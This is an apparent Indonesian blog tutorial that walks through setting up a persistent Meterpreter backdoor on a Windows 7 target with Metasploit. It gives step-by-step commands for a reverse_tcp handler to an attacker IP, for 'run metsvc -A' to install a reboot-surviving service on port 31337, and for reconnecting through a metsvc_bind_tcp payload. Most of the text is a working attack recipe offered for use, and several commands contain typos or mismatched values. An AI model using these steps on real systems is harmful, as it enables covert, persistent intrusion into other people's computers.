Automatic Backdoor running Windows 7

Target    : 192.168.2.2 (Windows 7)
Penyerang : 192.168.2.3 (Backtrack 5 R3)
Bagaimana agar mempertahankan backdoor yang telah berhasil di masukkan dan telah sukses menuai meterpreter shell agar pada saat sistem di reboot dapat langsung mengkonekan diri kita pada sistem target
 
Yang perlu di persiapkan
1. Sistem Operasi Backtrack R3
2. Metasploit
3. Meterpreter shell yang sudah ditanam pada target, untuk penjelasan bagaimana agar dapat menanam shell pada target bisa dibaca dari artikel http://ayodyadsr.blogspot.com/2013/10/membuat-exploit-sederhana-pada-windows.html
Saatnya eksekusi 😀
1. Buka Terminal pada Sistem Operasi Backtrack
2. Ketikan msfconcole pada terminal
3. Ketikan use exploit/multi/handler
4. Tentukan payload dengan reverse_tcp, set payload windows/meterpreter/reverse_tcp
5. Tentukan IP kita  (Penyerang), LHOST 192.168.2.3
6. Tentukan Port kita (Penyerang), LPORT 666
7. Lalu jalankan exploit, exploit
Pada saat target mengeksekusi exploit yang telah kita buat, berikut session yang terjadi
backtrack-1
8. Isikan perintah, run metsvc –A
metsvc -A tadi akan membuka sebuah service reverse pada windows 7 dengan port secara default yaitu 31337 
Pada kali ini sistem target telah dimiliki untuk menjadikan backdoor kita otomatis berjalan pada sistem target walaupun sistem target telah di reboot atau di shutdown tetap diambil,  bahwa perintah metsvc –A akan membentuk reverse karena itu kita butuh payload bind. Langkah yang harus ditempuh adalah
1. Buka Terminal pada Sistem Operasi Backtrack
2. Ketikan msfconsole pada terminal
3. Gunakan exploit multi handler dengan cara, exploit/multihandler
4. Gunakan payload dengan metsvc, set payload windows/metsvc_bind_tcp 
4. Tentukan IP Target (192.168.2.3), set RHOST 192.168.2.2
5. Tentukan Port Target (31337), set LPORT 31337
6. Kemudian jalankan, exploit
Iklan

Tinggalkan Balasan

Please log in using one of these methods to post your comment:

Logo WordPress.com

You are commenting using your WordPress.com account. Logout / Ubah )

Gambar Twitter

You are commenting using your Twitter account. Logout / Ubah )

Foto Facebook

You are commenting using your Facebook account. Logout / Ubah )

Foto Google+

You are commenting using your Google+ account. Logout / Ubah )

Connecting to %s